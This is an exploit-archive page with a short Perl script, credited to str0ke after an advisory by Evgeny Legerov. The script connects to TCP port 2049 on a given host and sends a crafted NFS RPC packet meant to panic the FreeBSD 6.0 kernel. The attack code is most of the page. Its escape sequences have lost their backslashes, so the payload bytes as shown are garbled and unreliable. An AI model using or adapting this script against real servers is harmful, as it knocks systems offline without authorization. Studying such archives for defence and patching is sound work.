[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : FreeBSD 6.0 (nfsd) Remote Kernel Panic Denial of Service Exploit
# Published : 2006-02-28
# Author : Evgeny Legerov
# Previous Title : XM Easy Personal FTP Server 1.0 (Port) Remote Overflow PoC
# Next Title : CrossFire <= 1.8.0 (oldsocketmode) Remote Buffer Overflow PoC
#!/usr/bin/perl
## Saw an advisory on Dailydave and wrote a little script to
## check my freebsd boxes (kind of evil). /str0ke (milw0rm.com)
##
## ProtoVer NFS testsuite 1.0 uncovered remote kernel panic vulnerability in FreeBSD 6.0 kernel.
## Evgeny Legerov
## www.gleg.net
use IO::Socket;
sub usage
{
print "FreeBSD 6.0 (nfsd) Remote Kernel Panic Denial of Service Exploitn";
print "Advisory from Evgeny Legerov (www.gleg.net)n";
print "Code by str0ke (milw0rm.com)n";
print "Usage: $0 www.example.comn";
exit ();
}
my $host = shift || &usage;
my $printer = "x80x00x00x00x00x00x00x01x00x00x00x00" .
"x00x00x00x02x00x01x86xa5x00x00x00x01" .
"x00x00x00x01x00x00x00x00x00x00x00x00" .
"x00x00x00x00x00x00x00x00x00x00x00x04" .
"x2fx74x6dx70";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "2049") || die "n+ Connection failed...n";
print $socket $printer . "n";
# www.Syue.com [2006-02-28]